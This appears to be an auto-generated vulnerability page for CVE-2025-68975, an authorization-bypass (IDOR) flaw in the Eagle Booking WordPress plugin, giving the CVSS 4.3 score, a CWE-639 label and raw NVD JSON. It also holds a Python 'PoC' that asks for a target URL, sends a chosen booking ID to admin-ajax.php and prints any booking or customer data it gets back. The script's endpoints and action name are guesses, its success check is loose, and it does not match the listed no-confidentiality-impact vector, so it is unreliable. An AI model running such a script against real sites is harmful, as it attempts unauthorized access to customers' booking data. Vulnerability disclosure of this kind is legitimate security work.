Security Vulnerability Report
中文
CVE-2025-68975 CVSS 4.3 MEDIUM

CVE-2025-68975

Published: 2025-12-30 11:15:56
Last Modified: 2026-04-27 19:16:38

Description

Authorization Bypass Through User-Controlled Key vulnerability in Eagle-Themes Eagle Booking eagle-booking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Eagle Booking: from n/a through <= 1.3.4.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Eagle Booking <= 1.3.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68975 Eagle Booking IDOR/POC # Affected: Eagle Booking <= 1.3.4.3 # Type: Authorization Bypass Through User-Controlled Key (IDOR) import requests import sys target = input("Enter target URL (e.g., https://example.com): ").rstrip('/') # IDOR endpoint - typically involves booking or user data access # Example endpoints that may be vulnerable: endpoints = [ '/wp-admin/admin-ajax.php', '/?eagle_booking_action=booking_details', '/wp-json/eagle-booking/v1/bookings' ] # Attacker-controlled object reference (modify this based on target) malicious_params = { 'booking_id': '999', # Target victim's booking ID 'action': 'eagle_booking_get_booking' } print(f"[*] Testing CVE-2025-68975 on {target}") print(f"[*] Target endpoint: {endpoints[0]}") # Test IDOR vulnerability response = requests.get( f"{target}{endpoints[0]}", params=malicious_params, allow_redirects=False ) if response.status_code == 200: content = response.text if 'booking' in content.lower() or 'customer' in content.lower(): print("[+] Potential vulnerability confirmed!") print(f"[+] Response contains sensitive data:") print(content[:500]) else: print("[-] No obvious data leakage detected") else: print(f"[-] Status code: {response.status_code}") print("\n[*] Note: Modify parameters based on actual application behavior")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68975", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:56.017", "lastModified": "2026-04-27T19:16:38.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Eagle-Themes Eagle Booking eagle-booking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Eagle Booking: from n/a through <= 1.3.4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/eagle-booking/vulnerability/wordpress-eagle-booking-plugin-1-3-4-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}